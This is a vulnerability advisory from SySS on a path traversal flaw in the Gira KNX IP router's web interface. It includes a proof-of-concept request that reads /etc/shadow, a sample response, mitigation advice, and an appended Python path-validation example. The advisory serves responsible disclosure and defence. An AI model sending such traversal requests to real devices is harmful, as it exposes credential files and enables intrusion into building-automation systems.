Advisory ID: SYSS-2023-015
Product: Gira KNX IP router
Manufacturer: Gira Giersiepen GmbH & Co. KG
Affected Version(s): 3.1.3683.0, 3.3.8.0
Tested Version(s): 3.1.3683.0, 3.3.8.0
Vulnerability Type: Path Traversal (CWE-22)
Risk Level: High
Solution Status: Unknown
Manufacturer Notification: 2023-05-11
Solution Date: Unknown
Public Disclosure: 2023-06-28
CVE Reference: CVE-2023-33277
Author of Advisory: Marc Gessler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Gira KNX IP router is a connection device for KNX lines for data
transmission over the Internet Protocol.

The manufacturer describes the product as follows (see [1]):

> Connection of KNX lines with aid of data networks and use of the
> Internet protocol (IP).
> Coupling of a KNX system together with the Gira HomeServer or Gira
> FacilityServer.
> Filtering and forwarding of telegrams.
> Use as line or area coupler.
[...]

Due to insufficient validation of user-provided input, it is vulnerable
to path traversal attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

A path traversal vulnerability was discovered on the product's web
interface. By sending a specially crafted HTTP request to the web
interface, files and directories outside the web root can be read and
sensitive information can be accessed.

Furthermore, as the web interface is running with root privileges, it is
possible to read sensitive files, for example "/etc/shadow".
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Request:

    GET /../../../../../etc/shadow HTTP/1.1

Response:

    root:abcdefghijklmn:10933:0:99999:7:::
    bin:*:10933:0:99999:7:::
    daemon:*:10933:0:99999:7:::
    adm:*:10933:0:99999:7:::
    lp:*:10933:0:99999:7:::
    sync:*:10933:0:99999:7:::
    shutdown:*:10933:0:99999:7:::
    halt:*:10933:0:99999:7:::
    uucp:*:10933:0:99999:7:::
    operator:*:10933:0:99999:7:::
    ftp:*:10933:0:99999:7:::
    nobody:*:10933:0:99999:7:::
    default:abcdefghijklmn:10933:0:99999:7:::

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Validate all user-supplied path values on the server side and do not
allow access to directories outside the web root or to other sensitive
files.

Additionally, check whether the web interface actually needs to run with
root privileges. If these privileges are not required, run the web
interface with lower privileges.

More information can be found at:
https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2023-05-09: Vulnerability discovered
2023-05-11: Vulnerability reported to manufacturer
2023-06-28: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Gira KNX IP router
    https://katalog.gira.de/en/datenblatt.html?id=658626
[2] SySS Security Advisory SYSS-2023-015
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-015.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Marc Gessler of SySS GmbH.
E-Mail: marc.gessler@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/marc_gessler.asc
Key ID: 0x5077DCEB1C98D0A2
Key Fingerprint: 3F7B B558 6734 8FCF 25A0 F596 5077 DCEB 1C98 D0A2

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en
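The server-side path validation recommended in the Solution section, as an added example that is not part of the advisory or of Gira's firmware. It assumes a hypothetical web root of /var/www/html (the advisory does not state the device's real one) and shows how a request like the PoC's "/../../../../../etc/shadow" is rejected, including percent-encoded and double-encoded variants.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed web root for this example; the real device path is not known.
WEB_ROOT = "/var/www/html"


def resolve_request_path(request_path: str, web_root: str = WEB_ROOT) -> Optional[str]:
    """Map an HTTP request path onto a file below web_root.

    Returns the absolute filesystem path when the request stays inside
    the web root, or None when it would escape it (path traversal).
    """
    # Decode percent-encoding before any checks so "%2e%2e%2f" is seen
    # as "../"; decoding twice also catches double-encoded "%252e".
    decoded = unquote(unquote(request_path))

    # NUL bytes can truncate the path in C-based servers; reject outright.
    if "\x00" in decoded:
        return None

    # Join first, then normalise lexically. posixpath.normpath collapses
    # "." and ".." without touching the filesystem, and any ".." that
    # climbs above "/" simply stays at "/", so the containment check
    # below is what decides.
    candidate = posixpath.normpath(posixpath.join(web_root, decoded.lstrip("/")))

    root = web_root.rstrip("/")
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    # In a real server, additionally resolve symlinks (os.path.realpath)
    # before opening, since this check is purely lexical.
    return candidate


if __name__ == "__main__":
    # The advisory's PoC request is rejected; a normal page is served.
    print(resolve_request_path("/../../../../../etc/shadow"))  # None
    print(resolve_request_path("/index.html"))  # /var/www/html/index.html
```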